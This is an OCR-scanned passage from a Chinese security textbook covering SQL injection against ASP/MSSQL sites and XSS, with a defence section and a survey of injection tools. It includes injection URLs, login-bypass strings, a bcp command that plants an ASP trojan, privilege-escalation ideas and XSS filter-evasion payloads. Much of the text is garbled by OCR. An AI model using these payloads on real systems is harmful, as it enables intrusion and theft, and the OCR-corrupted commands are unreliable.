D:\inetpub\scripts; E:\inetpub\scripts 等 。 二 是 遍历 系统 的 目录 结构 ,分 析 结 果 并 发 现 
Web 虚拟 目录 ; 

先 创 建 一 个 临时 表 temp: 


HTTP: //xxx. xxx. xxx/abc. asp? p = YY; create table temp ( id nvarchar(255), numi nvarchar(255), 
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num2 nvarchar(255), num3 nvarchar(255)); 


接 下 来 : 
CD 利用 xp_availablemedia 来 获得 当前 所 有 驱动 器 ,并 存 和 人 temp KP: 


HTTP: // xxx. xxx. xxx/abc.asp?p = YY; insert temp ... ter. dbo. xp availablemedia; -- 可 以 通过 查询 
temp 的 内 容 来 获得 驱动 器 列表 及 相关 信息 。 


(2) 利用 xp_subdirs 获得 子 目录 列表 ,并 存 和 人 temp 表 中 : 
HTTP: // xxx. xxx. xxx/abc.asp?p = YY; insert into temp(i ... dbo.xp subdirs 'c:V'; 
(3) 利用 xp. dirtree 获得 所 有 子 目 录 的 目录 树 结构 ,并 存 入 temp 表 中 : 


HTTP: //xxx. xxx. xxx/abc. asp?p = YY; insert into temp(id,numl) exec master. dbo. xp_dirtree 'c:V'; 


5. 上 传 ASP 木马 

所 谓 ASP 木马 ,就 是 一 段 有 特殊 功能 的 ASP 代码 ,并 放 入 Web 虚拟 目录 的 Scripts 
下 ,远程 客户 通过 IE 就 可 执行 它 , 进 而 得 到 系统 的 USER 权限 ,实现 对 系统 的 初步 控制 。 
上 传 ASP 木马 一 般 有 以 下 两 种 比较 有 效 的 方法 。 

1) 利用 Web 的 远程 管理 功能 

许多 Web 站 点 为 了 维护 的 方便 ,都 提供 了 远程 管理 的 功能 ; 也 有 不 少 Web 站 点 ,其 内 
容 是 对 于 不 同 的 用 户 有 不 同 的 访问 权限 。 为 了 达到 对 用 户 权 限 的 控制 ,都 有 一 个 网 页 ,要 求 
用 户 名 与 密码 ,只 有 输入 了 正确 的 值 ,才能 进行 下 一 步 的 操作 ,可 以 实现 对 Web 的 管理 ,如 
上 传 .下 载 文件 ,目录 浏览 .修改 配置 等 。 

因此 , 若 获取 正确 的 用 户 名 与 密码 ,不 仅 可 以 上 传 ASP 木马 ,有 时 甚至 能 够 直接 得 到 
USER 权限 而 浏览 系统 ,上 一 步 的 “发 现 Web 虚拟 目录 ”的 复杂 操作 都 可 省 略 。 

用 户 名 及 密码 一 般 存放 在 一 张 表 中 ,发 现 这 张 表 并 读 取 其 中 内 容 便 解决 了 问题 。 以 下 
给 出 两 种 有 效 方法 。 

CD 注入 法 

从 理论 上 说 ,认证 网 页 中 会 有 型 如 select * from admin where username = 'XXX' and 
password 一 'YYY ' 的 请 句 , 若 在 正式 运行 此 句 之 前 ,没有 进行 必要 的 字符 过 滤 , 则 很 容易 实 
施 SQL 注入 。 

如 在 “用 户 名 ”文本 框 内 输入 abc' or 1 二 1--, 在 “密码 " 框 内 输入 123, 则 SQL 语句 变 成 
select * from admin where username-— 'abc' or 1—1 and password 一 '123'。 无 论 用 户 输 入 
任何 用 户 名 与 密码 ,此 语句 永远 都 能 正确 执行 ,由 此 可 轻易 骗 过 系统 ,获取 合法 身份 。 

(2) 猜 解 法 

基本 思路 是 : 猜 解 所 有 数据 库 名 称 , 猜 出 库 中 的 每 张 表 名 ,分 析 可 能 是 存放 用 户 名 与 密 
码 的 表 名 , 猜 出 表 中 的 每 个 字段 名 , 猜 出 表 中 的 每 条 记录 内 容 。 

2) 利用 表 内 容 导 成 文件 功能 

SQL 有 BCP 命令 , 它 可 以 把 表 的 内 容 导 成 文本 文件 并 放 到 指定 位 置 。 利 用 这 项 功能 ， 
可 以 先 建 一 张 临时 表 , 然 后 在 表 中 一 行 一 行 地 输入 一 个 ASP 木马 ,然后 用 BCP 命令 导出 形 
W ASP 文件。 

命令 行 格式 如 下 : 
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bcp "select * from text..foo" queryout c: VinetpubVWwwwrootVruncommand.asp - c - S localhost 
- Usa - P foobar ('S' 参 数 为 执行 查询 的 服务 器 , "U' 参 数 为 用 户 名 , 'P' 参 数 为 密码 ,最 终 上 传 了 一 个 


runcommand. asp 木马 ) 


6. 得 到 系统 的 管理 员 权限 

ASP 木马 只 有 USER 权限 ,要 想 获取 对 系统 的 完全 控制 ,还 要 有 系统 的 管理 员 权限 。 
怎么 办 ? 提升 权限 的 方法 有 很 多 种 : 上 传 木马 ,修改 开机 自动 运行 的 . ini 文件 ( 它 一 重启 ， 
便 死 定 了 ); 复制 CMD. exe 到 scripts, 人 为 制造 UNICODE 漏洞 ; 下 载 SAM 文件 ,破解 并 
获取 OS 的 所 有 用 户 名 密码 ; 视 系 统 的 具体 情况 而 定 ,可 以 采取 不 同 的 方法 。 
6.10.3 常见 注入 方法 


LIES 
先 猜 表 名 ， 


And (Select count( * ) from 表 名 )<>0 

猜 列 名 : 

And (Select count( 列 名 ) from 表 名 )<>0 

或 者 也 可 以 这 样 : 

and exists (select * from 表 名 ) 

and exists (select 列 名 from X 4) 

返回 正确 的 ,那么 写 的 表 名 或 列 名 就 是 正确 的 。 

这 里 要 注意 的 是 ,exists 不 能 应 用 于 猜 内 容 上 ,例如 and exists (select lenCuser) from 
admin) 773 这 样 是 不 行 的 。 

很 多 人 都 喜欢 查询 里 面 的 内 容 ,一 旦 IIS 没有 关闭 错误 提示 ,那么 就 可 以 利用 报错 方法 
轻松 获得 库 里 面 的 内 容 , 从 而 获得 数据 库 连 接 用 户 名 : 


; and user>0 


在 IS 服务 器 提示 未 关闭 ,并 且 SQL Server 返回 错误 提示 的 情况 下 ,可 以 直接 从 出 错 
信息 获取 到 信息 变量 的 信息 。 


2. 方法 三 

后 台 身 份 验证 绕 过 漏洞 。 

验证 绕 过 漏洞 就 是 'or' 二 'or' 后 台 绕 过 漏洞 ,利用 的 就 是 AND 和 OR 的 运算 规则 ,从 而 
造成 后 台 脚 本 逻辑 性 错误 。 


例如 ,管理 员 的 账号 密码 都 是 admin, 那 么 再 比如 后 台 的 数据 库 查 询 语句 是 


user = request("user") 
passwd = request("passwd" ) 
sql = 'select admin from adminbate where user = '&'''&user&'''&'and passwd = '&'''&passwd&''" 


那么 使 用 'or 'a' 一 'a 来 作用 户 名 密码 的 话 ,查询 就 变 成 了 : 


select admin from adminbate where user = ''or 'a'- 'a'and passwd = ''or 'a'- 'a' 
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这 样 的 话 ,根据 运算 规则 ,这 里 一 共有 4 个 查询 语句 ,那么 查询 结果 就 是 : 假 or 真 and ft or 
真 , 先 算 and 再 算 or, 最 终结 果 为 真 ,这 样 就 可 以 进 到 后 台 了 。 

这 种 漏洞 存在 必须 要 有 两 个 条 件 , 第 一 ,在 后 台 验 证 代码 上 ,账号 密码 的 查询 是 要 同一 
条 查询 语句 ,也 就 是 类 似 


sql= "select * from admin where username = '"&username&'&"passwd = '"&passwd&' 


一 旦 账号 密码 是 分 开 查 询 的 , 先 查 账号 , 青 查 密码 ,就 没有 办 法 了 。 
第 二 就 是 要 看 密码 加 不 加 密 , 一 旦 被 MD5 加 密 或 者 其 他 加 密 方式 加 密 的 , 那 就 要 看 第 
一 种 条 件 有 没有 ,没有 达到 第 一 种 条 件 的 话 , 那 就 没戏 了 。 


6.10.4 SQL 注入 防范 


了 解 了 SQL 注入 的 方法 ,如 何 能 防止 SQL 注入 ? 如 何 进 一 步 防范 SQL 注入 的 泛滥 ? 
通过 一 些 合理 的 操作 和 配置 来 降低 SQL 注入 的 危险 。 

1. 使 用 参数 化 的 过 滤 性 语句 

永远 不 要 使 用 动态 拼装 SQL, 可 以 使 用 参数 化 的 SQL 或 直接 使 用 存储 过 程 进 行 数 据 
查询 存 取 。 

要 防御 SQL 注入 ,用 户 的 输入 就 绝对 不 能 直接 被 嵌入 到 SQL 语句 中 。 人 恰恰 相反 ,用 户 
的 输入 必须 进行 过 滤 ,或 者 使 用 参数 化 的 语句 。 参 数 化 的 语句 使 用 参数 而 不 是 将 用 户 输入 
嵌入 到 语句 中 。 在 多 数 情况 中 ,SQL 语句 就 得 以 修正 。 然 后 ,用 户 输入 就 被 限于 一 个 参数 。 

2. 输入 验证 

永远 不 要 信任 用 户 的 输入 。 对 用 户 的 输入 进行 校 验 ,可 以 通过 政策 表达 式 , 或 限制 长 
度 ,对 单 引 号 和 双 “-” 进 行 转换 等 。 

检查 用 户 输入 的 合法 性 ,确信 输入 的 内 容 只 包含 合法 的 数据 。 数 据 检 查 应 当 在 客户 端 
和 服务 器 端 都 执行 ,之 所 以 要 执行 服务 器 端 验证 ,是 为 了 弥补 客户 端 验 证 机 制 脆 弱 的 安 
全 性 。 

在 客户 端 ,攻击 者 完全 有 可 能 获得 网 页 的 源 代码 ,修改 验证 合法 性 的 脚本 (或 者 直接 删 
除 脚本 ) ,然后 将 非法 内 容 通 过 修改 后 的 表单 提交 给 服务 器 。 因 此 ,要 保证 验证 操作 确实 已 
经 执行 ,唯一 的 办 法 就 是 在 服务 器 端 也 执行 验证 。 可 以 使 用 许多 内 建 的 验证 对 象 , 例如 
Regular Expression Validator, 它 们 能 够 自动 生成 验证 用 的 客户 端 脚本 ,当然 也 可 以 插入 服 
务 器 端的 方法 调用 。 如 果 找 不 到 现成 的 验证 对 象 , 可 以 通过 Custom Validator 自己 创建 
= 

3. 错误 消息 处 理 

防范 SQL 注入 ,还 要 避免 出 现 一 些 详 细 的 错误 消息 ,应 用 的 异常 信息 应 该 给 出 尽 可 能 
少 的 提示 ,最 好 使 用 自 定义 的 错误 信息 对 原始 出 错 信息 进行 包装 ,因为 黑客 们 可 以 利用 这 些 
消息 。 要 使 用 一 种 标准 的 输入 确认 机 制 来 验证 所 有 输入 数据 的 长 度 、 类 型 .语句 、 企 业 规 
则 等 。 

4. 加 密 处 理 

不 要 把 机 密 信息 直接 存放 ,加 密 或 者 Hash 掉 密码 和 敏感 的 信息 。 
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将 用 户 登 录 名 称 、 密 码 等 数据 加 密 保存 。 加 密 用 户 输入 的 数据 ,然后 再 将 它 与 数据 库 中 
保存 的 数据 比较 ,这 相当 于 对 用 户 输入 的 数据 进行 了 “消毒 处理, 用 户 输入 的 数据 不 再 对 数 
据 库 有 任何 特殊 的 意义 ,从 而 也 就 防止 了 攻击 者 注入 SQL 命令 。 

5. 存储 过 程 来 执行 所 有 的 查询 

SQL 参数 的 传递 方式 将 防止 攻击 者 利用 单 引号 和 连 字符 实施 攻击 。 此 外 , 它 还 使 得 数 
据 库 权限 可 以 限制 到 只 允许 特定 的 存储 过 程 执 行 ,所 有 的 用 户 输入 必须 遵从 被 调用 的 存储 
过 程 的 安全 上 下 文 , 这 样 就 很 难 再 发 生 注 入 式 攻击 了 。 

6. 使 用 专业 的 漏洞 扫描 工具 

攻击 者 们 目前 正在 自动 搜索 攻击 目标 并 实施 攻击 ,其 技术 其 至 可 以 轻易 地 被 应 用 于 其 
他 的 Web 架构 中 的 漏洞 中 。 企 业 应 当 投 资 于 一 些 专 业 的 漏洞 扫描 工具 ,SQL 注入 的 检测 
方法 一 般 采用 辅助 软件 或 网 站 平台 来 检测 ,软件 一 般 采 用 SQL 注入 检测 工具 Jsky, 网 站 平 
台 有 MSCSOFT SCAN 等 。 采用 MSCSOFT-IPS 可 以 有 效 地 防御 SQL 注入 、XSS 攻击 等 。 
一 个 完善 的 漏洞 扫描 程序 不 同 于 网 络 扫描 程序 , 它 专门 查找 网 站 上 的 SQL 注入 式 漏洞 。 最 
新 的 漏洞 扫描 程序 可 以 查找 最 新 发 现 的 漏洞 。 

7. 确保 数据 库 安全 

永远 不 要 使 用 管理 员 权限 的 数据 库 连 接 ,为 每 个 应 用 使 用 单独 的 权限 进行 有 限 的 数据 
库 连 接 。 

锁定 数据 库 的 安全 ,只 给 访问 数据 库 的 Web 应 用 功能 所 需 的 最 低 的 权限 ,撤销 不 必 
要 的 公共 许可 ,使 用 强大 的 加 密 技术 来 保护 敏感 数据 并 维护 审查 跟踪 。 如 果 Web 应 用 不 
需要 访问 某 些 表 ,那么 确认 它 没有 访问 这 些 表 的 权限 。 如 果 Web 应 用 只 需要 只 读 的 权 
限 ,那么 就 禁止 它 对 此 表 的 drop, insert, update, delete 的 权限 ,并 确保 数据 库 打 了 最 新 
补丁 。 

8. 安全 审 评 

在 部 署 应 用 系统 前 ,始终 要 做 安全 审 评 。 建 立 一 个 正式 的 安全 过 程 ,并 且 每 次 做 更 新 
时 ,要 对 所 有 的 编码 做 审 评 。 开 发 队伍 在 正式 上 线 前 会 做 很 详细 的 安全 审 评 , 然 后 在 几 周 或 
几 个 月 之 后 他 们 做 一 些 很 小 的 更 新 时 ,他 们 会 跳 过 安全 审 评 这 关 ,“ 就 是 一 个 小 小 的 更 新 ,我 
们 以 后 再 做 编码 审 评 好 了 ”。 这 种 做 法 是 不 可 取 的 ,应 始终 坚持 做 安全 审 评 。 


6.10.5 注入 工具 


1. BSQL Hacker 

BSQL Hacker 是 由 Portcullis 实验 室 开 发 的 ,BSQL Hacker 是 一 个 SQL 自动 注入 工 
具 ( 支 持 SQL BEBO ,其 设计 目的 是 希望 能 对 任何 的 数据 库 进行 SQL 溢出 注入 。BSQL 
Hacker 的 适用 群体 是 那些 对 注入 有 经 验 的 使 用 者 和 那些 想 进 行 自动 SQL 注入 的 人 群 。 
BSQL Hacker 可 自动 对 Oracle 和 MySQL 数据 库 进行 攻击 ,并 自动 提取 数据 库 的 数据 和 架 
构 , 如 图 6-17 所 示 。 

2. TheMole 

The Mole 是 一 款 开源 的 自动 化 SQL 注入 工具 ,其 可 绕 过 IPS/IDS( 入 侵 防 御 系 统 / 入 
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侵 检测 系统 )。 只 需 提供 一 个 URL 和 一 个 可 用 的 关键 字 , 它 就 能 够 检测 注入 点 并 利用 。 
The Mole 可 以 使 用 union 注入 技术 和 基于 逻辑 查询 的 注入 技术 。The Mole 攻击 范围 包括 
SQL Server, MySQL , Postgres 和 Oracle 数据 库 ,如 图 6-18 所 示 。 


Beta but Getting There! =j xj 
Injection Import Edit Exploits Help 


区 ld |J Injection Wizard | ')Start * Stop | ORACLE 7 sf Lest Injection | gj Autonated Attack 


Request & Injection| Z9 Settings | C Extracted Database | 
Detection Type 
C Error Based 
(* Signature / Search Base 
C Tine Based 
C Deep Blind | 


Search Based |Tine Based| Deep Blind Based | Error Based] 


[^ Determine Differences Automatically [^ Use RegEx Syntax 


[True Response 


[False Response 


[-Position — — — — —34 


| 
| 

Max. Length ;100 -4 | 

Start Position a 


p Error Response 


Request History —— — | Preview 


p Other Settings — } 
I Follow Redirect 


|v Enable History Web Preview 


[ Version check finished. 


Raw Request | Application Log 


6-17 BSQL Hacker 


File Edit View Search Termina! Help 

san ss@brian:~/nasel/themole-code$ ./mole.py 
| | Y, 

| | 

| | 

| | 

WEE 


Developed by Nasel(http://www.nasel,com.ar) 


Published under GPLv3 
Be efficient and have fun! 


图 6-18 The Mole 
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3. Pangolin 

Pangolin 是 一 款 帮 助 渗透 测试 人 员 进行 SQL 注入 测试 的 安全 工具 。Pangolin 5j JSky 
(Web 应 用 安全 漏洞 扫描 器 .Web 应 用 安全 评估 工具 ) 都 是 NOSEC 公司 的 产品 。Pangolin 
具备 友好 的 图 形 界面 以 及 支持 测试 几乎 所 有 数据 库 (Access\MS SQL, MySQL, Oracle, 
Informix, DB2,Sybase, PostgreSQL, SQLite), Pangolin 能 够 通过 一 系列 非常 简单 的 操作 ， 
达到 最 大 化 的 攻击 测试 效果 。 它 从 检测 注入 开始 到 最 后 控制 目标 系统 都 给 出 了 测试 步骤 。 
Pangolin 是 目前 国内 使 用 率 最 高 的 SQL 注入 测试 的 安全 软件 ,如 图 6-19 所 示 。 


图 6-19 Pangolin 


4. SQLMap 

SQLMap 是 一 个 自动 SQL 注入 工具 。 其 可 胜任 执行 一 个 广泛 的 数据 库 管 理 系统 后 端 
指纹 ,检索 DBMS 数据 库 、usernames、 表 格 、 列 ,并 列举 整个 DBMS 信息 的 诸多 操作 。 
SQLmap 提供 转 储 数 据 库 表 以 及 MySQL, PostgreSQL, SQL Server 服务 器 下 载 或 上 传 任 
何 文件 并 执行 任意 代码 的 能 力 , 如 图 6-20 所 示 。 

5. Enema SQLi 

Enema SQLi 与 其 他 SQL 注入 工具 不 同 的 是 , Enema SQLi 不 是 自动 的 , 想 要 使 用 
Enema SQLi 需要 一 定 的 相关 知识 。Enema SQLi 能 够 使 用 用 户 自 定义 的 查询 以 及 插件 对 
SQL Server 和 MySQL 数据 库 进 行 攻击 。 支 持 基 于 error-based、 Union-based 和 blind 
time-based 的 注入 攻击 ,如 图 6-21 所 示 。 
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ander -kornbrusts-macbook-air:sqlaap-8.6.3 alex$ python saleap.py -c salaap.conf 


salsap/0.6.3 coded by Bernardo Damele A. G. «bernardo.dameleggsail.con» 
and Daniele Bellucci «daniele.bellucciégmail.coa» 


I") starting at: 11:14:33 


[11:14:33] [INFO] testing connection to the target url 
111:14:33] [IMFO] testing 1f the url 15 stable, vait a fev seconds 

111:14:35] [INFO] url 1s stable 

111:14:35] [IMFO] testing 1f User-Agent parameter "User-Agent' 15 dynamic 

[11:14:35] [VARNING] User-Agent parameter "User-Agent' 15 not dynamic 

[11:14:35] [INFO] testing 1f GET parameter "id' 15 dynamic 

[11:14:36] [INFO] confirming that GET parameter "id' is dynamic 

[11:14:36] [INFO] GET parameter "id' 1s dynsaic 

[11:14:36] [INFO] testing sql injection on GET parameter 'id' vith © parenthesis 

[11:14:36] [INFO] testing unescaped numeric injection on GET parameter "id" 

111:14:37] [IM] confirming unescaped numeric injection on GET parameter 'id' 

111:14:37] [INFO] GET parameter "id' 15 unescaped numeric injectable vith © parenthesis 

111:14:37] [INFO] testing for parenthesis on injectable parameter 

[11:14:30] [INFO] the injectable parameter requires 8 parenthesis 

[11:14:38] [INFO] testing inband sql injection on parameter 'id 

[11:14:39] [INFO] the target url could be affected by an inband sql injection vulnerability 

[11:14:39] [INFO] confiraing full inband sql injection on parameter "1d" 

[11:14:39] [INFO] the target url 15 affected by an exploitable full inband sql injection vulnerability 

[11:14:39] [INFO] query: UNION ALL SELECT NULL, CHR(98)||CHK(101)]]CHR(97)] | CMR(105) | |CHR(87) | | CHR 104) | [banner | |C 
HR(114) | |CHR(Ó7) | [CHR(121)] |CAR(82) |] CHR (107) | |CHR(7S) FROM viversion VMERE ROVNUN=1-- AND 8639-8639 

111:14:40] [INFO] performed 3 queries in 1 seconds 

111:14:40] [INFO] testing Oracle 

[11:14:40] [INFO] query: UNION ALL SELECT NULL, CHR(98)]|CHR(101)]]CHR(97)| | CHR (105) | | CHRC87) | | CHR 104) | JLENGTH(SY 
SDATE) | |CHR(114) | |CHR(67) | |CHR(121) | |CHR(82) | |CHR(187) | |CHR(75) FROM DUAL-- AND 8879-8879 

[11:14:40] [INFO] performed 1 queries in © seconds 

[11:14:40] [INFO] confireing Oracle 

[11:14:40] [INFO] query: UNION ALL SELECT NULL, CHR(98)]|CHR(101)]]CH&(97)| | CMR(105) | | CHR(87) | | CHR 104) | |SUBSTRCCV 
ERSTON) 1,2) | CHR (114) | |CHR(67) | [CHR(121) | |CHR(82) | JCHR(107)||CHR(75) FRON SYS.PRODUCT COMPONENT VERSION VMERE ROVN 
[E LES 

[11:14:40] [INFO] performed 1 queries in © seconds 

[11:14:40] [INFO] query: UNION ALL SELECT NULL, CHK(98)||CMR(101)]]CHR(97) | |CHR(105) | | CHR(87) | | CHR(104) | [banner | IC 
HR(114)| | CWR(67) | ICHR(121) | |CHR(82) | ] CHR (107) | [CHR(75) FRON viversion VMERE ROWNUN=1-- AND 599175991 

111:14:40] [INFO] performed 1 queries in © seconds 

web application technology: PHP 4.3.11 

back-end DBMS: active fingerprint: 0racte 111 


banner parsing fingerprint: Oracle 11.1.0. 
htal error message fingerprint: Oracle 


eee arn) 


[d 


Pep. /1. 14. 1 Omaa aap ~ 1 209 £201 N Matec tI 0p ND IN Od MOAN 
Naer tcs rane Os WO we WIN BO N90 e NOS 20o SU pente 
MAD. terme Krena Gira eher v 0utie vane dur LOBOS PNIS Or NON 
NN De SOROR TOUS Car NBN PANI Bo ur S RON US, Bar NON 
Ica SONDA SN OP Be 2801728 29 har OKT N IS Ond eat ame 

50 rome 
mena cueva S Ohare S aaie rare C's NOBIS IN PN char NOB TEN DN 
CIO T TAZIN Be 280x HN TN Be BONN 29 char B0 29 B a 280 


Ñ arora or n amele t QU S 2 calm rure NUN on WON per 


MIRINDA O30 TTI NB NON TIPOS. 
Pee OK]: om 
Fette court of carve n tatie: caters 


[1 E [QUE]: elect top 1 hw Dx) east rn ame os varchar) achar (On 7e) hom 
ipee Me sena crar rere 


she DTD achar(Dx73) and calum name not elect tu ] caen ums fm 
E eres re sena carra rere 


vername nman) aie are ear (Du) echar DS) «c Ox) echar (0n24) «car (f) eur (0nd scr (v) 


ASSI NB SIC TIN SN NONO NNN- 


RESPOHGE OX]: ensi 


poniest z -一 naso 


tie rare «ur (0961) echar (On 75) sc COn 71) «char On 2A «che (1f) «char (0nd sch v6 


6-21 Enema SQLi 


6. sqlsus 


sqlsus 是 一 个 开放 源 代码 的 My: 
令 行 界面 。 
Web 站 点 可 写 目录 ,上 传 和 控制 后 门 ,克隆 数据 


qlsus 可 以 获取 数据 库 结 构 , 注 入 自己 
等 ,如 图 6-22 所 示 。 


-" 


QL 注入 和 接管 工具 ,sqlsus 使 用 Perl 编写 并 基于 
的 SQL A, AJ As Ae P ROC IE MET 


E 


figi 
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onf.pm.blind conf.pm.sighted 
/sqlsus] vi conf.pm.cmsms 


/sqlsus] ./sqlsus nf.pm. 


olumns for UNION : 3 (1,0,1) 


Variable | Value 

database | cmsms 

user A "8@'localhost" 
andard 
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7. Safe3 SQL Injector 

Safe3 SQL Injector 是 一 个 最 强大 和 最 易 使 用 的 渗透 测试 工具 , 它 可 以 自动 检测 和 利用 
SQL 注入 漏洞 和 数据 库 服务 器 的 过 程 中 。Safe3 SQL Injector 具备 读 取 MySQL, Oracle, 
PostgreSQL, SQL Server, Access, SQLite, Firebird, Sybase, SAP MaxDB 等 数据 库 的 能 力 。 
同时 支持 向 MySQL、SQL Server 写 人 文件 ,以 及 SQL Server 和 Oracle 中 执行 任意 命令 。 
Safe3 SQL Injector 也 支持 基于 error-based、Union-based 和 blind time-based 的 注入 攻击 ， 
如 图 6-23 所 示 。 


EXIIT SQL 广 入 安全 测试 v6. 9--http://wmrr. safe3. 


FIE (http://www. runtry. com/list. php?id=140 GET - 


类 型 Number [v] 数据库 | SQL 了 | 字段 |3 | #31 |! | 关键 字 EZ |xbase - 


S G BEEM LIENESESDIS 


可 控 Ctr1 键 渤 定 左 侧 多 个 字段 名 猜 解 ,右键 点 击 可 复制 或 导出 数据 


IRL 


图 6-23 Safe3 SQL Injector 
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SQL 注入 实验 请 参阅 实验 29。 
6.11 XSS 攻击 


XSS 又 叫 CSS(Cross Site Script , 跨 站 脚本 攻击 )。 它 指 的 是 恶意 攻击 者 往 Web 页 面 
里 插入 恶意 HTML 代码 , 当 用 户 浏 览 该 页 时 ,嵌入 Web 页 面 里 面 的 HTML 代码 会 被 执 
行 ,从 而 达到 恶意 用 户 的 特殊 目的 。 

常见 的 脚本 类 型 包括 HTML, JavaScript, VBScript, ActiveX, Flash 等 。XSS 可 以 出 现 
在 任意 浏览 器 中 。 


6.11.1 XSS 跨 站 脚本 
如 果 不 明 白 跨 站 脚本 漏洞 的 成 因 , 请 思考 下 面 的 代码 : 


<html> 

< head > test </head> 

<body> 

< script» alert("XSS" )</script> 

</body> 

</html> XSS 

这 是 一 段 很 简单 的 HTML 代码 ,其 中 包括 一 个 
JavaScript 语句 块 ,该 语句 块 使 用 内 置 的 alert O 函数 来 打 
开 一 个 消息 框 ,消息 框 中 显示 XSS 信息 。 把 以 上 代码 保 
TEH HTM 或 HTML 文件 ,然后 用 浏览 器 打开 ,就 会 看 到 Wen XM tM 
如 图 6-24 所 示 的 效果 。 


6.11.2. XSS 跨 站 攻击 流程 
XSS 跨 站 攻击 的 流程 如 图 6-25 所 示 。 


d. m (D 
| 
e 


3. 恶意 代码 被 执行 


"E 


图 6-25 XS 攻击 流程 


4. 受害 者 浏览 攻击 者 恶意 
5. 攻击 者 发 出 
6. 受害 者 发 送 敏和 
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6.11.3 XSS 跨 站 攻击 原理 


XSS 属 于 被 动 式 的 攻击 。 攻击 者 先 构 造 一 个 跨 站 页 面 ,利用 Script, < IMG >, 
二 IFRAME 放 等 各 种 方式 使 得 用 户 浏 览 这 个 页 面 时 ,触发 对 被 攻击 站 点 的 http 请 求 。 此 
时 ,如 果 被 攻击 者 已 经 在 被 攻击 站 点 登录 ,就 会 持 有 该 站 点 cookie。 这 样 该 站 点 会 认为 被 攻 
击 者 发 起 了 一 个 http 请 求 。 而 实际 上 这 个 请 求 是 在 被 攻击 者 不 知情 的 情况 下 发 起 的 ,由 此 
攻击 者 在 一 定 程度 上 达到 了 冒充 被 攻击 者 的 目的 。 精 心地 构造 这 个 攻击 请 求 ,可 以 达到 家 
充 发 文 ,夺取 权限 等 多 个 攻击 目的 。 在 常见 的 攻击 实例 中 ,这 个 请 求 是 通过 Script 来 发 起 
的 ,因此 被 称 为 Cross Site Script。 攻 击 Yahoo Mail 的 Yamanner 蠕虫 是 一 个 著名 的 XSS 
攻击 实例 。Yahoo Mail 系统 有 一 个 漏洞 , 当 用 户 在 Web 上 查看 信件 时 ,有 可 能 执行 到 信件 
VW JavaScript 代码 。 病 毒 可 以 利用 这 个 漏洞 使 被 攻击 用 户 运行 病毒 的 Script。 同 时 
Yahoo Mail 系统 使 用 了 AJAX 技术 ,这 样 病毒 的 Script 可 以 很 容易 地 向 Yahoo Mail 系统 
发 起 AJAX 请 求 , 从 而 得 到 用 户 的 地 址 敌 , 并 发 送 恶 意 代码 给 他 人 。 如 : 


">< script» alert('XSS') ;«/script ><" 


这 种 注入 方法 很 像 SQL 注入 。 

XSS 攻击 的 危害 如 下 。 

(1) 盗 取 各 类 用 户 账 号 ,如 机 器 登录 账号 .用户 网 银 账号 .各 类 管理 员 账号 ; 
(2) 控制 企业 数据 ,包括 读 取 、 算 改 、 添 加 、 删 除 企业 敏感 数据 的 能 力 ; 

(3) 盗窃 企 业 重要 的 具有 商业 价值 的 资料 ; 

(4) 非法 转账 ; 

(5) 强制 发 送 电 子 邮 件 ; 

(6) 网 站 挂 马 ; 

CT) 控制 受害 者 机 器 向 其 他 网 站 发 起 攻击 。 


6.11.4 XSS 攻击 分 类 


XSS 攻击 主要 分 为 以 下 两 类 。 

一 类 是 来 自 内 部 的 攻击 ,主要 指 的 是 利用 Web 程序 自身 的 漏洞 ,提交 特殊 的 字符 串 , 从 
而 使 得 跨 站 页 面 直接 存在 于 被 攻击 站 点 上 ,这 个 字符 串 被 称 为 跨 站 语句 。 这 一 类 攻击 所 利 
用 的 漏洞 非常 类 似 于 SQL Injection 漏洞 ,都 是 Web 程序 没有 对 用 户 输入 做 充分 的 检查 和 
过 滤 。 上 文 的 Yamanner 就 是 一 例 。 

另 一 类 则 是 来 自 外 部 的 攻击 ,主要 指 的 是 自己 构造 KSS 跨 站 漏洞 网 页 或 者 寻找 非 目 标 
机 以 外 的 有 跨 站 漏洞 的 网 页 。 如 要 渗透 一 个 站 点 ,我们 自己 构造 一 个 跨 站 网 页 放 在 自己 的 
服务 器 上 ,然后 通过 结合 其 他 技术 ,如 社会 工程 学 等 ,欺骗 目标 服务 器 的 管理 员 打开 。 这 一 
类 攻击 的 威胁 相对 较 低 ,至 少 AJAX 要 发 起 跨 站 调用 是 非常 困难 的 。 


6.11.5 跨 站 脚本 分 类 


持久 型 跨 站 : 最 直接 的 危害 类 型 , 跨 站 代码 存储 在 服务 器 (数据 库 )。 
非 持久 型 跨 站 : 反射 型 跨 站 脚本 漏洞 ,最 普遍 的 类 型 。 
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DOM 跨 站 (DOM XSS); DOM(Document Object Model, 文 档 对 象 模 型 ) ,客户 端 脚本 
处 理 逻 辑 导致 的 安全 问题 。 
具体 实验 参见 实验 30, 演 示 持 久 性 跨 站 脚本 类 型 。 


6.11.6 XSS 的 脚本 攻击 的 触发 条 件 


1. 脚本 插入 

CD dfi A JavaScript 和 VBScript 正常 字符 。 

fij 1; <img src— "javascript :alertC/xss/) " — 

例 2: <table background =" javascript: alert (/xss/) " > </table> ' /TE K fit P dfi A 
MW 

例 3: <img src "vbscript: msgbox(C"a") " — 

(2) 转换 字符 类 型 。 

将 JavaScript È VBScript 中 的 任 一 个 或 全 部 字符 转换 为 十 进 制 或 十 六 进 制 字符 。 

例 1: <img src— "javascript:alert(/xss/)"— ' /将 j 字符 转 为 十 进 制 字符 j 

例 2: <img src— "javascript :alertC/xss/) "7 ' /将 j 字符 转 为 十 六 进 制 字符 j 

(3) 插入 混 活字 符 。 

在 系统 控制 字符 中 ,除了 头 部 的 ?Cnull) 和 尾部 的 (del) 外 ,其 他 31 个 字符 均 可 作为 混淆 
字符 ,比如 、 等 字符 都 可 插入 到 JavaScript È VBscript 的 头 部 ,其 中 Tab 符 换行 符 、 回 车 符 
还 可 以 插入 到 代码 中 任意 地 方 。 

Bl 1: <img src=" javascript:alert(/a/)" — " /插入 到 代码 头 部 

Bl 2: <img src— "java scr ipt:alert(/a/)"> ' /插入 到 代码 中 任意 位 置 

例 3: <IMG SRC 一 "jav ascript;alert "XSS) "7 '/ 是 回 车 符 的 十 六 进 制 形式 

例 4: <IMG SRC-— "jav ascript:alert'XSS) "7 '/ 是 换行 符 的 十 六 进 制 形式 

2. 样式 表 

(1) 利用 CSS 代码 @import expression 触发 XSS 漏洞 。 

f] 1: @import "http://web/xss. css"; ' 导 入 外 部 带 有 XSS 代码 的 CSS 样式 表 

fij 2: @import'javascript:alert("xss")'; ' 调 用 JavaScript 脚本 触发 漏洞 

fij 3: body{xss:expression(alert('xss'))) ' 在 内 部 样式 表 中 加 入 expression 事件 

例 4: <img style =" xss: expression (alert("xss"))" > ' fe W Bk FE SX K P JI A 
